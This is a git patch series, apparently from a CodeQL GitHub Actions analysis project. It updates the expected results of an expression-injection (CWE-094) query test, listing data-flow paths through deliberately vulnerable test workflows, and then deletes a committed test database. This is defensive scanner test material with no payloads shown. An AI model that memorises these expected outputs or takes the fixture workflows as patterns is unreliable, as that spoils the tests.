.github/workflows/inter-job0.yml:26:9:34:2 | Uses Step: step [value] | +| .github/workflows/inter-job1.yml:15:7:17:4 | Job outputs node [job_output] | .github/workflows/inter-job1.yml:43:14:43:52 | echo ${ ... utput}} | +| .github/workflows/inter-job1.yml:15:19:15:49 | ${{ ste ... alue }} | .github/workflows/inter-job1.yml:15:7:17:4 | Job outputs node [job_output] | +| .github/workflows/inter-job1.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job1.yml:30:19:30:63 | ${{ ste ... iles }} | +| .github/workflows/inter-job1.yml:26:9:34:2 | Uses Step: step [value] | .github/workflows/inter-job1.yml:15:19:15:49 | ${{ ste ... alue }} | +| .github/workflows/inter-job1.yml:30:19:30:63 | ${{ ste ... iles }} | .github/workflows/inter-job1.yml:26:9:34:2 | Uses Step: step [value] | +| .github/workflows/inter-job2.yml:15:7:17:4 | Job outputs node [job_output] | .github/workflows/inter-job2.yml:45:14:45:52 | echo ${ ... utput}} | +| .github/workflows/inter-job2.yml:15:19:15:49 | ${{ ste ... alue }} | .github/workflows/inter-job2.yml:15:7:17:4 | Job outputs node [job_output] | +| .github/workflows/inter-job2.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job2.yml:30:19:30:63 | ${{ ste ... iles }} | +| .github/workflows/inter-job2.yml:26:9:34:2 | Uses Step: step [value] | .github/workflows/inter-job2.yml:15:19:15:49 | ${{ ste ... alue }} | +| .github/workflows/inter-job2.yml:30:19:30:63 | ${{ ste ... iles }} | .github/workflows/inter-job2.yml:26:9:34:2 | Uses Step: step [value] | +| .github/workflows/inter-job4.yml:15:7:17:4 | Job outputs node [job_output] | .github/workflows/inter-job4.yml:44:14:44:52 | echo ${ ... utput}} | +| .github/workflows/inter-job4.yml:15:19:15:49 | ${{ ste ... alue }} | .github/workflows/inter-job4.yml:15:7:17:4 | Job outputs node [job_output] | +| .github/workflows/inter-job4.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job4.yml:30:19:30:63 | ${{ ste ... iles }} | +| .github/workflows/inter-job4.yml:26:9:34:2 | Uses Step: step [value] | .github/workflows/inter-job4.yml:15:19:15:49 | ${{ ste ... alue }} | +| .github/workflows/inter-job4.yml:30:19:30:63 | ${{ ste ... iles }} | .github/workflows/inter-job4.yml:26:9:34:2 | Uses Step: step [value] | | .github/workflows/issues.yaml:4:15:4:45 | ${{ git ... itle }} | .github/workflows/issues.yaml:15:12:15:39 | echo '$ ... env }}' | | .github/workflows/issues.yaml:10:16:10:46 | ${{ git ... itle }} | .github/workflows/issues.yaml:17:12:17:36 | echo '$ ... env }}' | | .github/workflows/issues.yaml:20:19:20:49 | ${{ git ... itle }} | .github/workflows/issues.yaml:18:12:18:37 | echo '$ ... env }}' | @@ -75,12 +90,30 @@ nodes | .github/workflows/image_link_generator.yml:28:9:35:6 | Run Step: trim-url [trimmed_url] | semmle.label | Run Step: trim-url [trimmed_url] | | .github/workflows/image_link_generator.yml:31:27:31:66 | ${{ ste ... _url }} | semmle.label | ${{ ste ... _url }} | | .github/workflows/image_link_generator.yml:36:14:37:126 | \| | semmle.label | \| | -| .github/workflows/inter-job.yml:8:7:10:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | -| .github/workflows/inter-job.yml:8:19:8:49 | ${{ ste ... alue }} | semmle.label | ${{ ste ... alue }} | -| .github/workflows/inter-job.yml:15:9:19:6 | Uses Step: source | semmle.label | Uses Step: source | -| .github/workflows/inter-job.yml:19:9:27:2 | Uses Step: step [value] | semmle.label | Uses Step: step [value] | -| .github/workflows/inter-job.yml:23:19:23:63 | ${{ ste ... iles }} | semmle.label | ${{ ste ... iles }} | -| .github/workflows/inter-job.yml:36:14:36:52 | echo ${ ... utput}} | semmle.label | echo ${ ... utput}} | +| .github/workflows/inter-job0.yml:15:7:17:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | +| .github/workflows/inter-job0.yml:15:19:15:49 | ${{ ste ... alue }} | semmle.label | ${{ ste ... alue }} | +| .github/workflows/inter-job0.yml:22:9:26:6 | Uses Step: source | semmle.label | Uses Step: source | +| .github/workflows/inter-job0.yml:26:9:34:2 | Uses Step: step [value] | semmle.label | Uses Step: step [value] | +| .github/workflows/inter-job0.yml:30:19:30:63 | ${{ ste ... iles }} | semmle.label | ${{ ste ... iles }} | +| .github/workflows/inter-job0.yml:43:14:43:52 | echo ${ ... utput}} | semmle.label | echo ${ ... utput}} | +| .github/workflows/inter-job1.yml:15:7:17:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | +| .github/workflows/inter-job1.yml:15:19:15:49 | ${{ ste ... alue }} | semmle.label | ${{ ste ... alue }} | +| .github/workflows/inter-job1.yml:22:9:26:6 | Uses Step: source | semmle.label | Uses Step: source | +| .github/workflows/inter-job1.yml:26:9:34:2 | Uses Step: step [value] | semmle.label | Uses Step: step [value] | +| .github/workflows/inter-job1.yml:30:19:30:63 | ${{ ste ... iles }} | semmle.label | ${{ ste ... iles }} | +| .github/workflows/inter-job1.yml:43:14:43:52 | echo ${ ... utput}} | semmle.label | echo ${ ... utput}} | +| .github/workflows/inter-job2.yml:15:7:17:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | +| .github/workflows/inter-job2.yml:15:19:15:49 | ${{ ste ... alue }} | semmle.label | ${{ ste ... alue }} | +| .github/workflows/inter-job2.yml:22:9:26:6 | Uses Step: source | semmle.label | Uses Step: source | +| .github/workflows/inter-job2.yml:26:9:34:2 | Uses Step: step [value] | semmle.label | Uses Step: step [value] | +| .github/workflows/inter-job2.yml:30:19:30:63 | ${{ ste ... iles }} | semmle.label | ${{ ste ... iles }} | +| .github/workflows/inter-job2.yml:45:14:45:52 | echo ${ ... utput}} | semmle.label | echo ${ ... utput}} | +| .github/workflows/inter-job4.yml:15:7:17:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | +| .github/workflows/inter-job4.yml:15:19:15:49 | ${{ ste ... alue }} | semmle.label | ${{ ste ... alue }} | +| .github/workflows/inter-job4.yml:22:9:26:6 | Uses Step: source | semmle.label | Uses Step: source | +| .github/workflows/inter-job4.yml:26:9:34:2 | Uses Step: step [value] | semmle.label | Uses Step: step [value] | +| .github/workflows/inter-job4.yml:30:19:30:63 | ${{ ste ... iles }} | semmle.label | ${{ ste ... iles }} | +| .github/workflows/inter-job4.yml:44:14:44:52 | echo ${ ... utput}} | semmle.label | echo ${ ... utput}} | | .github/workflows/issues.yaml:4:15:4:45 | ${{ git ... itle }} | semmle.label | ${{ git ... itle }} | | .github/workflows/issues.yaml:10:16:10:46 | ${{ git ... itle }} | semmle.label | ${{ git ... itle }} | | .github/workflows/issues.yaml:13:12:13:49 | echo '$ ... tle }}' | semmle.label | echo '$ ... tle }}' | diff --git a/ql/test/query-tests/Security/CWE-094/ExpressionInjection.expected b/ql/test/query-tests/Security/CWE-094/ExpressionInjection.expected index b21ac80574bb..1ea054565bc1 100644 --- a/ql/test/query-tests/Security/CWE-094/ExpressionInjection.expected +++ b/ql/test/query-tests/Security/CWE-094/ExpressionInjection.expected @@ -15,11 +15,26 @@ edges | .github/workflows/image_link_generator.yml:25:24:25:67 | ${{ ste ... _url }} | .github/workflows/image_link_generator.yml:22:9:28:6 | Run Step: curl [redirected_url] | | .github/workflows/image_link_generator.yml:28:9:35:6 | Run Step: trim-url [trimmed_url] | .github/workflows/image_link_generator.yml:36:14:37:126 | \| | | .github/workflows/image_link_generator.yml:31:27:31:66 | ${{ ste ... _url }} | .github/workflows/image_link_generator.yml:28:9:35:6 | Run Step: trim-url [trimmed_url] | -| .github/workflows/inter-job.yml:8:7:10:4 | Job outputs node [job_output] | .github/workflows/inter-job.yml:36:14:36:52 | echo ${ ... utput}} | -| .github/workflows/inter-job.yml:8:19:8:49 | ${{ ste ... alue }} | .github/workflows/inter-job.yml:8:7:10:4 | Job outputs node [job_output] | -| .github/workflows/inter-job.yml:15:9:19:6 | Uses Step: source | .github/workflows/inter-job.yml:23:19:23:63 | ${{ ste ... iles }} | -| .github/workflows/inter-job.yml:19:9:27:2 | Uses Step: step [value] | .github/workflows/inter-job.yml:8:19:8:49 | ${{ ste ... alue }} | -| .github/workflows/inter-job.yml:23:19:23:63 | ${{ ste ... iles }} | .github/workflows/inter-job.yml:19:9:27:2 | Uses Step: step [value] | +| .github/workflows/inter-job0.yml:15:7:17:4 | Job outputs node [job_output] | .github/workflows/inter-job0.yml:43:14:43:52 | echo ${ ... utput}} | +| .github/workflows/inter-job0.yml:15:19:15:49 | ${{ ste ... alue }} | .github/workflows/inter-job0.yml:15:7:17:4 | Job outputs node [job_output] | +| .github/workflows/inter-job0.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job0.yml:30:19:30:63 | ${{ ste ... iles }} | +| .github/workflows/inter-job0.yml:26:9:34:2 | Uses Step: step [value] | .github/workflows/inter-job0.yml:15:19:15:49 | ${{ ste ... alue }} | +| .github/workflows/inter-job0.yml:30:19:30:63 | ${{ ste ... iles }} | .github/workflows/inter-job0.yml:26:9:34:2 | Uses Step: step [value] | +| .github/workflows/inter-job1.yml:15:7:17:4 | Job outputs node [job_output] | .github/workflows/inter-job1.yml:43:14:43:52 | echo ${ ... utput}} | +| .github/workflows/inter-job1.yml:15:19:15:49 | ${{ ste ... alue }} | .github/workflows/inter-job1.yml:15:7:17:4 | Job outputs node [job_output] | +| .github/workflows/inter-job1.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job1.yml:30:19:30:63 | ${{ ste ... iles }} | +| .github/workflows/inter-job1.yml:26:9:34:2 | Uses Step: step [value] | .github/workflows/inter-job1.yml:15:19:15:49 | ${{ ste ... alue }} | +| .github/workflows/inter-job1.yml:30:19:30:63 | ${{ ste ... iles }} | .github/workflows/inter-job1.yml:26:9:34:2 | Uses Step: step [value] | +| .github/workflows/inter-job2.yml:15:7:17:4 | Job outputs node [job_output] | .github/workflows/inter-job2.yml:45:14:45:52 | echo ${ ... utput}} | +| .github/workflows/inter-job2.yml:15:19:15:49 | ${{ ste ... alue }} | .github/workflows/inter-job2.yml:15:7:17:4 | Job outputs node [job_output] | +| .github/workflows/inter-job2.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job2.yml:30:19:30:63 | ${{ ste ... iles }} | +| .github/workflows/inter-job2.yml:26:9:34:2 | Uses Step: step [value] | .github/workflows/inter-job2.yml:15:19:15:49 | ${{ ste ... alue }} | +| .github/workflows/inter-job2.yml:30:19:30:63 | ${{ ste ... iles }} | .github/workflows/inter-job2.yml:26:9:34:2 | Uses Step: step [value] | +| .github/workflows/inter-job4.yml:15:7:17:4 | Job outputs node [job_output] | .github/workflows/inter-job4.yml:44:14:44:52 | echo ${ ... utput}} | +| .github/workflows/inter-job4.yml:15:19:15:49 | ${{ ste ... alue }} | .github/workflows/inter-job4.yml:15:7:17:4 | Job outputs node [job_output] | +| .github/workflows/inter-job4.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job4.yml:30:19:30:63 | ${{ ste ... iles }} | +| .github/workflows/inter-job4.yml:26:9:34:2 | Uses Step: step [value] | .github/workflows/inter-job4.yml:15:19:15:49 | ${{ ste ... alue }} | +| .github/workflows/inter-job4.yml:30:19:30:63 | ${{ ste ... iles }} | .github/workflows/inter-job4.yml:26:9:34:2 | Uses Step: step [value] | | .github/workflows/issues.yaml:4:15:4:45 | ${{ git ... itle }} | .github/workflows/issues.yaml:15:12:15:39 | echo '$ ... env }}' | | .github/workflows/issues.yaml:10:16:10:46 | ${{ git ... itle }} | .github/workflows/issues.yaml:17:12:17:36 | echo '$ ... env }}' | | .github/workflows/issues.yaml:20:19:20:49 | ${{ git ... itle }} | .github/workflows/issues.yaml:18:12:18:37 | echo '$ ... env }}' | @@ -75,12 +90,30 @@ nodes | .github/workflows/image_link_generator.yml:28:9:35:6 | Run Step: trim-url [trimmed_url] | semmle.label | Run Step: trim-url [trimmed_url] | | .github/workflows/image_link_generator.yml:31:27:31:66 | ${{ ste ... _url }} | semmle.label | ${{ ste ... _url }} | | .github/workflows/image_link_generator.yml:36:14:37:126 | \| | semmle.label | \| | -| .github/workflows/inter-job.yml:8:7:10:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | -| .github/workflows/inter-job.yml:8:19:8:49 | ${{ ste ... alue }} | semmle.label | ${{ ste ... alue }} | -| .github/workflows/inter-job.yml:15:9:19:6 | Uses Step: source | semmle.label | Uses Step: source | -| .github/workflows/inter-job.yml:19:9:27:2 | Uses Step: step [value] | semmle.label | Uses Step: step [value] | -| .github/workflows/inter-job.yml:23:19:23:63 | ${{ ste ... iles }} | semmle.label | ${{ ste ... iles }} | -| .github/workflows/inter-job.yml:36:14:36:52 | echo ${ ... utput}} | semmle.label | echo ${ ... utput}} | +| .github/workflows/inter-job0.yml:15:7:17:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | +| .github/workflows/inter-job0.yml:15:19:15:49 | ${{ ste ... alue }} | semmle.label | ${{ ste ... alue }} | +| .github/workflows/inter-job0.yml:22:9:26:6 | Uses Step: source | semmle.label | Uses Step: source | +| .github/workflows/inter-job0.yml:26:9:34:2 | Uses Step: step [value] | semmle.label | Uses Step: step [value] | +| .github/workflows/inter-job0.yml:30:19:30:63 | ${{ ste ... iles }} | semmle.label | ${{ ste ... iles }} | +| .github/workflows/inter-job0.yml:43:14:43:52 | echo ${ ... utput}} | semmle.label | echo ${ ... utput}} | +| .github/workflows/inter-job1.yml:15:7:17:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | +| .github/workflows/inter-job1.yml:15:19:15:49 | ${{ ste ... alue }} | semmle.label | ${{ ste ... alue }} | +| .github/workflows/inter-job1.yml:22:9:26:6 | Uses Step: source | semmle.label | Uses Step: source | +| .github/workflows/inter-job1.yml:26:9:34:2 | Uses Step: step [value] | semmle.label | Uses Step: step [value] | +| .github/workflows/inter-job1.yml:30:19:30:63 | ${{ ste ... iles }} | semmle.label | ${{ ste ... iles }} | +| .github/workflows/inter-job1.yml:43:14:43:52 | echo ${ ... utput}} | semmle.label | echo ${ ... utput}} | +| .github/workflows/inter-job2.yml:15:7:17:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | +| .github/workflows/inter-job2.yml:15:19:15:49 | ${{ ste ... alue }} | semmle.label | ${{ ste ... alue }} | +| .github/workflows/inter-job2.yml:22:9:26:6 | Uses Step: source | semmle.label | Uses Step: source | +| .github/workflows/inter-job2.yml:26:9:34:2 | Uses Step: step [value] | semmle.label | Uses Step: step [value] | +| .github/workflows/inter-job2.yml:30:19:30:63 | ${{ ste ... iles }} | semmle.label | ${{ ste ... iles }} | +| .github/workflows/inter-job2.yml:45:14:45:52 | echo ${ ... utput}} | semmle.label | echo ${ ... utput}} | +| .github/workflows/inter-job4.yml:15:7:17:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | +| .github/workflows/inter-job4.yml:15:19:15:49 | ${{ ste ... alue }} | semmle.label | ${{ ste ... alue }} | +| .github/workflows/inter-job4.yml:22:9:26:6 | Uses Step: source | semmle.label | Uses Step: source | +| .github/workflows/inter-job4.yml:26:9:34:2 | Uses Step: step [value] | semmle.label | Uses Step: step [value] | +| .github/workflows/inter-job4.yml:30:19:30:63 | ${{ ste ... iles }} | semmle.label | ${{ ste ... iles }} | +| .github/workflows/inter-job4.yml:44:14:44:52 | echo ${ ... utput}} | semmle.label | echo ${ ... utput}} | | .github/workflows/issues.yaml:4:15:4:45 | ${{ git ... itle }} | semmle.label | ${{ git ... itle }} | | .github/workflows/issues.yaml:10:16:10:46 | ${{ git ... itle }} | semmle.label | ${{ git ... itle }} | | .github/workflows/issues.yaml:13:12:13:49 | echo '$ ... tle }}' | semmle.label | echo '$ ... tle }}' | @@ -176,7 +209,10 @@ subpaths | .github/workflows/gollum.yml:9:12:9:56 | echo '$ ... ame }}' | .github/workflows/gollum.yml:9:12:9:56 | echo '$ ... ame }}' | .github/workflows/gollum.yml:9:12:9:56 | echo '$ ... ame }}' | Potential expression injection, which may be controlled by an external user. | | .github/workflows/gollum.yml:10:12:10:59 | echo '$ ... ame }}' | .github/workflows/gollum.yml:10:12:10:59 | echo '$ ... ame }}' | .github/workflows/gollum.yml:10:12:10:59 | echo '$ ... ame }}' | Potential expression injection, which may be controlled by an external user. | | .github/workflows/image_link_generator.yml:36:14:37:126 | \| | .github/workflows/image_link_generator.yml:18:17:18:48 | ${{ git ... body }} | .github/workflows/image_link_generator.yml:36:14:37:126 | \| | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/inter-job.yml:36:14:36:52 | echo ${ ... utput}} | .github/workflows/inter-job.yml:15:9:19:6 | Uses Step: source | .github/workflows/inter-job.yml:36:14:36:52 | echo ${ ... utput}} | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/inter-job0.yml:43:14:43:52 | echo ${ ... utput}} | .github/workflows/inter-job0.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job0.yml:43:14:43:52 | echo ${ ... utput}} | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/inter-job1.yml:43:14:43:52 | echo ${ ... utput}} | .github/workflows/inter-job1.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job1.yml:43:14:43:52 | echo ${ ... utput}} | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/inter-job2.yml:45:14:45:52 | echo ${ ... utput}} | .github/workflows/inter-job2.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job2.yml:45:14:45:52 | echo ${ ... utput}} | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/inter-job4.yml:44:14:44:52 | echo ${ ... utput}} | .github/workflows/inter-job4.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job4.yml:44:14:44:52 | echo ${ ... utput}} | Potential expression injection, which may be controlled by an external user. | | .github/workflows/issues.yaml:13:12:13:49 | echo '$ ... tle }}' | .github/workflows/issues.yaml:13:12:13:49 | echo '$ ... tle }}' | .github/workflows/issues.yaml:13:12:13:49 | echo '$ ... tle }}' | Potential expression injection, which may be controlled by an external user. | | .github/workflows/issues.yaml:14:12:14:48 | echo '$ ... ody }}' | .github/workflows/issues.yaml:14:12:14:48 | echo '$ ... ody }}' | .github/workflows/issues.yaml:14:12:14:48 | echo '$ ... ody }}' | Potential expression injection, which may be controlled by an external user. | | .github/workflows/issues.yaml:15:12:15:39 | echo '$ ... env }}' | .github/workflows/issues.yaml:4:15:4:45 | ${{ git ... itle }} | .github/workflows/issues.yaml:15:12:15:39 | echo '$ ... env }}' | Potential expression injection, which may be controlled by an external user. | From c8e89797eb59f6c5c0e03626616a8806b6ce9cc3 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 4 Mar 2024 15:43:38 +0100 Subject: [PATCH 085/707] remove test db --- db/baseline-info.json | 1 - db/codeql-database.yml | 10 - db/db-yaml/default/cache/.lock | 0 .../cache/cached-strings/pools/0/buckets/info | Bin 40 -> 0 bytes .../pools/0/buckets/page-000000 | Bin 8192 -> 0 bytes .../cache/cached-strings/pools/0/ids1/info | Bin 40 -> 0 bytes .../cached-strings/pools/0/ids1/page-000000 | Bin 8192 -> 0 bytes .../cached-strings/pools/0/indices1/info | Bin 40 -> 0 bytes .../pools/0/indices1/page-000000 | Bin 8192 -> 0 bytes .../default/cache/cached-strings/pools/0/info | Bin 41 -> 0 bytes .../cached-strings/pools/0/metadata/info | Bin 40 -> 0 bytes .../pools/0/metadata/page-000000 | Bin 8192 -> 0 bytes .../pools/0/pageDump/page-000000000 | Bin 1048592 -> 0 bytes .../cache/cached-strings/pools/poolInfo | Bin 28 -> 0 bytes .../cache/cached-strings/tuple-pool/header | Bin 4 -> 0 bytes ...9--Implementation---Cached--TNode-56603d11 | Bin 16 -> 0 bytes ...mplementation---Cached--TNode-56603d11#0#e | Bin 216 -> 0 bytes ...plementation---Cached--TNode-56603d11#1#eb | Bin 320 -> 0 bytes ...mplementation---Cached--TNode-56603d11#2#e | Bin 216 -> 0 bytes ...lementation---Cached--TNode-56603d11#3#eet | Bin 6312 -> 0 bytes ...-Implementation---Cached--TSplits-cdffdde7 | Bin 16 -> 0 bytes ...plementation---Cached--TSplits-cdffdde7#0# | Bin 12 -> 0 bytes ...ples#Cfg#f90a6699--Completion--TCompletion | Bin 16 -> 0 bytes ...s#Cfg#f90a6699--Completion--TCompletion#0# | Bin 12 -> 0 bytes ...s#Cfg#f90a6699--Completion--TSuccessorType | Bin 16 -> 0 bytes ...fg#f90a6699--Completion--TSuccessorType#0# | Bin 12 -> 0 bytes ...g#f90a6699--Completion--TSuccessorType#1#b | Bin 24 -> 0 bytes ...fg#f90a6699--Completion--TSuccessorType#2# | Bin 12 -> 0 bytes ...TaintTracking#f6f2598d--TaintFlow-0defa4a0 | Bin 16 -> 0 bytes ...king#f6f2598d--TaintFlow-0defa4a0#0#tttttt | Bin 3200 -> 0 bytes ...Tracking#f6f2598d--TaintFlow-0defa4a0#1#tt | Bin 896 -> 0 bytes ...TaintTracking#f6f2598d--TaintFlow-5b92615f | Bin 16 -> 0 bytes ...ntTracking#f6f2598d--TaintFlow-5b92615f#0# | Bin 12 -> 0 bytes ...racking#f6f2598d--TaintFlow-5b92615f#1#ttt | Bin 152 -> 0 bytes ...TaintTracking#f6f2598d--TaintFlow-6e089ab6 | Bin 16 -> 0 bytes ...ntTracking#f6f2598d--TaintFlow-6e089ab6#0# | Bin 12 -> 0 bytes ...TaintTracking#f6f2598d--TaintFlow-a2a08e4a | Bin 16 -> 0 bytes ...ntTracking#f6f2598d--TaintFlow-a2a08e4a#0# | Bin 12 -> 0 bytes ...Tracking#f6f2598d--TaintFlow-a2a08e4a#1#tt | Bin 116 -> 0 bytes ...TaintTracking#f6f2598d--TaintFlow-b0571e78 | Bin 16 -> 0 bytes ...ntTracking#f6f2598d--TaintFlow-b0571e78#0# | Bin 12 -> 0 bytes ...tTracking#f6f2598d--TaintFlow-b0571e78#1#t | Bin 88 -> 0 bytes ...TaintTracking#f6f2598d--TaintFlow-b18fe878 | Bin 16 -> 0 bytes ...tTracking#f6f2598d--TaintFlow-b18fe878#0#t | Bin 2216 -> 0 bytes ...taFlow---Cached--TAccessPathFront-12309985 | Bin 16 -> 0 bytes ...low---Cached--TAccessPathFront-12309985#0# | Bin 12 -> 0 bytes ...ow---Cached--TAccessPathFront-12309985#1#t | Bin 104 -> 0 bytes ...Flow---Cached--TAccessPathFrontOp-ea156098 | Bin 16 -> 0 bytes ...w---Cached--TAccessPathFrontOp-ea156098#0# | Bin 12 -> 0 bytes ...---Cached--TAccessPathFrontOp-ea156098#1#t | Bin 112 -> 0 bytes ...Flow---Cached--TApproxAccessPathF-0bf03857 | Bin 16 -> 0 bytes ...w---Cached--TApproxAccessPathF-0bf03857#0# | Bin 12 -> 0 bytes ...---Cached--TApproxAccessPathF-0bf03857#1#t | Bin 112 -> 0 bytes ...Flow---Cached--TApproxAccessPathF-baba9c49 | Bin 16 -> 0 bytes ...w---Cached--TApproxAccessPathF-baba9c49#0# | Bin 12 -> 0 bytes ...---Cached--TApproxAccessPathF-baba9c49#1#t | Bin 104 -> 0 bytes ...DataFlow---Cached--TBooleanOption-dec0af22 | Bin 16 -> 0 bytes ...aFlow---Cached--TBooleanOption-dec0af22#0# | Bin 12 -> 0 bytes ...Flow---Cached--TBooleanOption-dec0af22#1#b | Bin 24 -> 0 bytes ...nsDataFlow---Cached--TCallContext-54d858e5 | Bin 16 -> 0 bytes ...ataFlow---Cached--TCallContext-54d858e5#0# | Bin 12 -> 0 bytes ...ataFlow---Cached--TCallContext-54d858e5#2# | Bin 12 -> 0 bytes ...Flow---Cached--TDataFlowCallOptio-c18bdb95 | Bin 16 -> 0 bytes ...w---Cached--TDataFlowCallOptio-c18bdb95#0# | Bin 12 -> 0 bytes ...---Cached--TDataFlowCallOptio-c18bdb95#1#t | Bin 280 -> 0 bytes ...Flow---Cached--TLocalFlowCallCont-17f4a8f6 | Bin 16 -> 0 bytes ...w---Cached--TLocalFlowCallCont-17f4a8f6#0# | Bin 12 -> 0 bytes ...taFlow---Cached--TParamNodeOption-178d6b8b | Bin 16 -> 0 bytes ...low---Cached--TParamNodeOption-178d6b8b#0# | Bin 12 -> 0 bytes ...ionsDataFlow---Cached--TReturnCtx-f40235df | Bin 16 -> 0 bytes ...sDataFlow---Cached--TReturnCtx-f40235df#0# | Bin 12 -> 0 bytes ...sDataFlow---Cached--TReturnCtx-f40235df#1# | Bin 12 -> 0 bytes ...DataFlow---Cached--TReturnKindExt-9770a119 | Bin 16 -> 0 bytes ...Flow---Cached--TReturnKindExt-9770a119#0#t | Bin 16 -> 0 bytes .../tuples#DataFlowPrivate#6a54d7ad--TContent | Bin 16 -> 0 bytes ...les#DataFlowPrivate#6a54d7ad--TContent#0#s | Bin 104 -> 0 bytes ...es#DataFlowPrivate#6a54d7ad--TDataFlowType | Bin 16 -> 0 bytes ...DataFlowPrivate#6a54d7ad--TDataFlowType#0# | Bin 12 -> 0 bytes .../tuples#DataFlowPrivate#6a54d7ad--TNode | Bin 16 -> 0 bytes ...tuples#DataFlowPrivate#6a54d7ad--TNode#0#t | Bin 2216 -> 0 bytes ...ples#DataFlowPrivate#6a54d7ad--TReturnKind | Bin 16 -> 0 bytes ...s#DataFlowPrivate#6a54d7ad--TReturnKind#0# | Bin 12 -> 0 bytes ...#6a54d7ad--DataFlowType---TOption-4fb642c9 | Bin 16 -> 0 bytes ...54d7ad--DataFlowType---TOption-4fb642c9#0# | Bin 12 -> 0 bytes ...4d7ad--DataFlowType---TOption-4fb642c9#1#t | Bin 16 -> 0 bytes ...ion-Unit#54592529--Unit---TOption-51176e26 | Bin 16 -> 0 bytes ...-Unit#54592529--Unit---TOption-51176e26#0# | Bin 12 -> 0 bytes ...Unit#54592529--Unit---TOption-51176e26#1#t | Bin 16 -> 0 bytes .../tuple-pool/tuples#Unit#54592529--TUnit | Bin 16 -> 0 bytes .../tuple-pool/tuples#Unit#54592529--TUnit#0# | Bin 12 -> 0 bytes db/db-yaml/default/cache/pages/01.pack | Bin 65 -> 0 bytes db/db-yaml/default/cache/pages/01.pack.d | Bin 844 -> 0 bytes db/db-yaml/default/cache/pages/02.pack | Bin 79 -> 0 bytes db/db-yaml/default/cache/pages/08.pack | Bin 87 -> 0 bytes db/db-yaml/default/cache/pages/09.pack | Bin 167 -> 0 bytes db/db-yaml/default/cache/pages/09.pack.d | Bin 2341 -> 0 bytes db/db-yaml/default/cache/pages/0b.pack | Bin 65 -> 0 bytes db/db-yaml/default/cache/pages/0b.pack.d | Bin 292 -> 0 bytes db/db-yaml/default/cache/pages/0d.pack | Bin 84 -> 0 bytes db/db-yaml/default/cache/pages/17.pack | Bin 65 -> 0 bytes db/db-yaml/default/cache/pages/17.pack.d | Bin 5326 -> 0 bytes db/db-yaml/default/cache/pages/20.pack | Bin 65 -> 0 bytes db/db-yaml/default/cache/pages/20.pack.d | Bin 574 -> 0 bytes db/db-yaml/default/cache/pages/24.pack | Bin 65 -> 0 bytes db/db-yaml/default/cache/pages/24.pack.d | Bin 6318 -> 0 bytes db/db-yaml/default/cache/pages/26.pack | Bin 65 -> 0 bytes db/db-yaml/default/cache/pages/26.pack.d | Bin 294 -> 0 bytes db/db-yaml/default/cache/pages/27.pack | Bin 65 -> 0 bytes db/db-yaml/default/cache/pages/27.pack.d | Bin 1493 -> 0 bytes db/db-yaml/default/cache/pages/29.pack | Bin 84 -> 0 bytes db/db-yaml/default/cache/pages/2b.pack | Bin 84 -> 0 bytes db/db-yaml/default/cache/pages/2d.pack | Bin 91 -> 0 bytes db/db-yaml/default/cache/pages/33.pack | Bin 65 -> 0 bytes db/db-yaml/default/cache/pages/33.pack.d | Bin 393 -> 0 bytes db/db-yaml/default/cache/pages/37.pack | Bin 65 -> 0 bytes db/db-yaml/default/cache/pages/37.pack.d | Bin 106 -> 0 bytes db/db-yaml/default/cache/pages/3c.pack | Bin 65 -> 0 bytes db/db-yaml/default/cache/pages/3c.pack.d | Bin 916 -> 0 bytes db/db-yaml/default/cache/pages/42.pack | Bin 65 -> 0 bytes db/db-yaml/default/cache/pages/42.pack.d | Bin 5053 -> 0 bytes db/db-yaml/default/cache/pages/45.pack | Bin 65 -> 0 bytes db/db-yaml/default/cache/pages/45.pack.d | Bin 6001 -> 0 bytes db/db-yaml/default/cache/pages/46.pack | Bin 111 -> 0 bytes db/db-yaml/default/cache/pages/4c.pack | Bin 65 -> 0 bytes db/db-yaml/default/cache/pages/4c.pack.d | Bin 302 -> 0 bytes db/db-yaml/default/cache/pages/4d.pack | Bin 65 -> 0 bytes db/db-yaml/default/cache/pages/4d.pack.d | Bin 3292 -> 0 bytes db/db-yaml/default/cache/pages/4e.pack | Bin 116 -> 0 bytes db/db-yaml/default/cache/pages/4e.pack.d | Bin 1048 -> 0 bytes db/db-yaml/default/cache/pages/54.pack | Bin 320 -> 0 bytes db/db-yaml/default/cache/pages/55.pack | Bin 91 -> 0 bytes db/db-yaml/default/cache/pages/5d.pack | Bin 221 -> 0 bytes db/db-yaml/default/cache/pages/62.pack | Bin 159 -> 0 bytes db/db-yaml/default/cache/pages/6a.pack | Bin 179 -> 0 bytes db/db-yaml/default/cache/pages/6f.pack | Bin 65 -> 0 bytes db/db-yaml/default/cache/pages/6f.pack.d | Bin 1695 -> 0 bytes db/db-yaml/default/cache/pages/7a.pack | Bin 65 -> 0 bytes db/db-yaml/default/cache/pages/7a.pack.d | Bin 1284 -> 0 bytes db/db-yaml/default/cache/pages/7b.pack | Bin 65 -> 0 bytes db/db-yaml/default/cache/pages/7b.pack.d | Bin 151 -> 0 bytes db/db-yaml/default/cache/pages/84.pack | Bin 65 -> 0 bytes 